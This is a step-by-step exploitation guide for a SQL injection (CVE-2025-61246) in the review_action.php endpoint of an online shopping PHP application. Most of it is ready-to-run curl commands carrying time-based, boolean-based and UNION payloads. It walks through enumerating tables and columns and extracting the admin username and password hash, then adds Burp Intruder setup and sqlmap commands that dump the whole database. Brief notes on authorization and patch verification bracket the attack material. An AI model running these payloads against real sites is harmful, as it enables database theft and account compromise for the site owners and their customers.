# Manual Testing Guide - CVE-2025-61246

This guide provides step-by-step instructions for manually testing and exploiting the SQL injection vulnerability in the Online Shopping System PHP application.

## Prerequisites

- Burp Suite or similar HTTP proxy
- Web browser
- Basic understanding of SQL injection techniques
- Authorization to test the target system

## Step 1: Identify the Vulnerable Endpoint

The vulnerable endpoint is located at:
```
/online-shopping-system-php-master/review_action.php
```

This endpoint accepts POST requests with a `proId` parameter.

## Step 2: Baseline Request

First, send a normal request to establish a baseline response time.

### Using cURL

```bash
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1" \
  -w "\nTime: %{time_total}s\n"
```

**Expected Response Time**: < 1 second

## Step 3: Test for SQL Injection

### Test 1: Time-Based Blind SQL Injection

Send a payload that causes a 5-second delay if the application is vulnerable:

```bash
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -" \
  -w "\nTime: %{time_total}s\n"
```

**Expected Response Time**: ≥ 5 seconds (if vulnerable)

### Test 2: Boolean-Based Blind SQL Injection

Test with a true condition:

```bash
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND '1'='1"
```

Test with a false condition:

```bash
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND '1'='2"
```

Compare the responses - they should differ if vulnerable.

## Step 4: Extract Database Information

### Extract Database Version

```bash
# Test each character of the version
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND IF(SUBSTRING(VERSION(),1,1)='5', SLEEP(5), 0)-- -"
```

If the response takes 5 seconds, the first character is '5'. Repeat for each position.

### Extract Database Name

```bash
# Get database name length
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND IF(LENGTH(DATABASE())=10, SLEEP(5), 0)-- -"

# Extract first character
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND IF(SUBSTRING(DATABASE(),1,1)='s', SLEEP(5), 0)-- -"
```

### Extract Current User

```bash
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND IF(SUBSTRING(USER(),1,1)='r', SLEEP(5), 0)-- -"
```

## Step 5: Enumerate Tables

### Count Tables

```bash
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE())=15, SLEEP(5), 0)-- -"
```

### Extract Table Names

```bash
# Get first table name length
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND IF(LENGTH((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,1))=5, SLEEP(5), 0)-- -"

# Extract first character of first table
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 0,1),1,1)='u', SLEEP(5), 0)-- -"
```

## Step 6: Extract Column Names

```bash
# Get column count for 'users' table
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_name='users')=10, SLEEP(5), 0)-- -"

# Extract first column name
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 0,1),1,1)='i', SLEEP(5), 0)-- -"
```

## Step 7: Extract Data

### Extract User Credentials

```bash
# Get admin username
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND IF(SUBSTRING((SELECT username FROM users LIMIT 0,1),1,1)='a', SLEEP(5), 0)-- -"

# Get admin password hash
curl -X POST http://target.com/online-shopping-system-php-master/review_action.php \
  -d "proId=1' AND IF(SUBSTRING((SELECT password FROM users LIMIT 0,1),1,1)='5', SLEEP(5), 0)-- -"
```

## Step 8: Using Burp Suite

### Burp Suite Intruder Setup

1. **Capture the request** in Burp Proxy
2. **Send to Intruder** (Ctrl+I)
3. **Set payload position**:
   ```
   proId=1' AND IF(SUBSTRING(DATABASE(),§1§,1)='§a§', SLEEP(5), 0)-- -
   ```
4. **Configure payload sets**:
   - Set 1: Numbers (1-50) for position
   - Set 2: Character list (a-z, 0-9, _)
5. **Set attack type**: Cluster bomb
6. **Start attack** and analyze response times

### Burp Suite Repeater

1. Send request to Repeater (Ctrl+R)
2. Modify the `proId` parameter with payloads
3. Observe response times in the timing tab
4. Responses ≥ 5 seconds indicate successful injection

## Step 9: Using SQLMap (Automated)

```bash
# Basic detection
sqlmap -u "http://target.com/online-shopping-system-php-master/review_action.php" \
  --data="proId=1" \
  --batch

# Extract database
sqlmap -u "http://target.com/online-shopping-system-php-master/review_action.php" \
  --data="proId=1" \
  --current-db \
  --batch

# Dump all tables
sqlmap -u "http://target.com/online-shopping-system-php-master/review_action.php" \
  --data="proId=1" \
  -D database_name \
  --dump-all \
  --batch

# Extract specific table
sqlmap -u "http://target.com/online-shopping-system-php-master/review_action.php" \
  --data="proId=1" \
  -D database_name \
  -T users \
  --dump \
  --batch
```

## Common Payloads Reference

### Time-Based Payloads

```sql
-- Basic time delay
1' AND SLEEP(5)-- -

-- Conditional time delay
1' AND IF(1=1, SLEEP(5), 0)-- -

-- Using BENCHMARK
1' AND BENCHMARK(5000000, MD5('test'))-- -

-- Nested SELECT with SLEEP
1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
```

### Boolean-Based Payloads

```sql
-- True condition
1' AND '1'='1

-- False condition
1' AND '1'='2

-- Conditional check
1' AND (SELECT COUNT(*) FROM users)>0-- -
```

### Union-Based Payloads (if applicable)

```sql
-- Determine column count
1' ORDER BY 1-- -
1' ORDER BY 2-- -
1' ORDER BY 3-- -

-- Union select
1' UNION SELECT NULL,NULL,NULL-- -
1' UNION SELECT 1,DATABASE(),VERSION()-- -
```

## Response Analysis

### Indicators of Successful Injection

1. **Time-based**: Response time ≥ specified delay
2. **Boolean-based**: Different responses for true/false conditions
3. **Error-based**: SQL error messages in response
4. **Union-based**: Data from other tables in response

### False Positives

- Network latency
- Server load
- Application-level delays
- WAF/IDS interference

## Mitigation Verification

After applying patches, verify that:

1. Time-based payloads no longer cause delays
2. Boolean-based payloads return consistent responses
3. Error messages are suppressed
4. Input validation is properly implemented

## Notes

- Always test with proper authorization
- Document all findings
- Report responsibly
- Use a controlled environment when possible

## References

- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
- [PortSwigger SQL Injection Cheat Sheet](https://portswigger.net/web-security/sql-injection/cheat-sheet)
- [PayloadsAllTheThings - SQL Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
